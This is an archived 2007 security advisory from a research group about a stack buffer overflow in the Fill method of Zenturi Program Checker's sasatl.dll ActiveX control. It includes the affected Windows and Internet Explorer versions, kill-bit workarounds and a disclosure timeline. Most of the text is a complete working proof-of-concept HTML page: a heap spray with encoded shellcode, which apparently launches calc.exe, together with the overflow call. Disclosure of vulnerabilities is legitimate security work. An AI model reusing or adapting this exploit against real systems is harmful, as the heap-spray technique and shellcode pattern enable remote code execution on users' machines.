<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 TRANSITIONAL//EN">
<HTML>
<HEAD>
  <META HTTP-EQUIV="Content-Type" CONTENT="text/html; CHARSET=UTF-8">
  <META NAME="GENERATOR" CONTENT="GtkHTML/3.14.1">
</HEAD>
<BODY>
:. GOODFELLAS Security Research TEAM&nbsp; .:<BR>
:. http://goodfellas.shellcode.com.ar .:<BR>
<BR>
<BR>
sasatl.dll 1.5.0.531 Program Checker - JavaScript Heap Spraying Exploit<BR>
==========================================<BR>
Internal ID: VULWAR200707101.<BR>
<BR>
<BR>
Introduction<BR>
---------------<BR>
sasatl.dll is a library included in the Program Checker Pro software <BR>
package from Zenturi (http://www.programchecker.com).<BR>
<BR>
<BR>
Tested In<BR>
-----------<BR>
- Windows XP SP1/SP2 English/French with IE 6.0 / 7.0.<BR>
- Windows Vista Professional English/French SP1 with IE 7.0.<BR>
<BR>
<BR>
Summary<BR>
------------<BR>
The Fill method is prone to a stack-based buffer overflow <BR>
because it fails to properly check the boundaries of the data passed to it.<BR>
<BR>
<BR>
Impact<BR>
---------<BR>
An attacker could execute arbitrary code on the remote machine.<BR>
<BR>
<BR>
Workaround<BR>
---------------<BR>
- Set the kill bit for clsid:7D6B5B29-FC7E-11D1-9288-00104B885781 so that Internet Explorer will not instantiate the control.<BR>
- Unregister sasatl.dll using regsvr32 (regsvr32 /u sasatl.dll).<BR>
<BR>
<BR>
Timeline<BR>
----------<BR>
July 10, 2007 -- Bug published.<BR>
<BR>
<BR>
Credits<BR>
---------<BR>
* callAX &lt;callAX@shellcode.com.ar&gt;<BR>
* GoodFellas Security Research Team &lt;goodfellas.shellcode.com.ar&gt;<BR>
<BR>
Proof of Concept<BR>
----------------<BR>
<BR>
&lt;HTML&gt;<BR>
&lt;BODY&gt;<BR>
&nbsp; &lt;object id=boom classid=&quot;clsid:{7D6B5B29-FC7E-11D1-9288-00104B885781}&quot;&gt;&lt;/object&gt;<BR>
<BR>
&lt;SCRIPT&gt;<BR>
<BR>
var payLoadCode=unescape(<BR>
&quot;%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800&quot; +<BR>
&quot;%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A&quot; +<BR>
&quot;%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350&quot; +<BR>
&quot;%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40&quot; +<BR>
&quot;%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000&quot; +<BR>
&quot;%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040&quot; +<BR>
&quot;%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD&quot; +<BR>
&quot;%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40&quot; +<BR>
&quot;%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18&quot; +<BR>
&quot;%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0&quot; +<BR>
&quot;%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B&quot; +<BR>
&quot;%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24&quot; +<BR>
&quot;%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9&quot; +<BR>
&quot;%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C&quot; +<BR>
&quot;%u652E%u6578%u9000&quot;);<BR>
<BR>
<BR>
&nbsp;&nbsp;&nbsp; var spraySlide = unescape(&quot;%u9090%u9090&quot;);<BR>
&nbsp; var heapSprayToAddress = 0x0c0c0c0c;<BR>
<BR>
<BR>
&nbsp;&nbsp;&nbsp; function Tryme()<BR>
&nbsp;&nbsp;&nbsp; {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var size_buff = 900;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var x =&nbsp; unescape(&quot;%0C%0C%0C%0C&quot;);<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; while (x.length&lt;size_buff) x += x;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; x = x.substring(0,size_buff);<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; boom.Fill(x);<BR>
&nbsp;&nbsp;&nbsp; }<BR>
&nbsp;&nbsp;&nbsp; <BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; function getSpraySlide(spraySlide, spraySlideSize)<BR>
{<BR>
while (spraySlide.length*2&lt;spraySlideSize)<BR>
{<BR>
spraySlide += spraySlide;<BR>
}<BR>
spraySlide = spraySlide.substring(0,spraySlideSize/2);<BR>
return (spraySlide);<BR>
}<BR>
<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var heapBlockSize = 0x400000;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; var SizeOfHeapDataMoreover = 0x26;<BR>
&nbsp;&nbsp;&nbsp; var payLoadSize = (payLoadCode.length * 2);<BR>
<BR>
&nbsp;&nbsp;&nbsp; var spraySlideSize = heapBlockSize - (payLoadSize + SizeOfHeapDataMoreover);<BR>
&nbsp;&nbsp;&nbsp; var heapBlocks = (heapSprayToAddress+heapBlockSize)/heapBlockSize;<BR>
<BR>
&nbsp;&nbsp;&nbsp; var memory = new Array();<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; spraySlide = getSpraySlide(spraySlide,spraySlideSize);<BR>
<BR>
&nbsp;&nbsp;&nbsp; for (i=0;i&lt;heapBlocks;i++)<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; {<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; memory[i] = spraySlide +&nbsp; payLoadCode;<BR>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; }<BR>
<BR>
&lt;/SCRIPT&gt;<BR>
&lt;input language=JavaScript onclick=Tryme() type=button value=&quot;Proof of Concept&quot;&gt;<BR>
&lt;/BODY&gt;<BR>
&lt;/HTML&gt;
</BODY>
</HTML>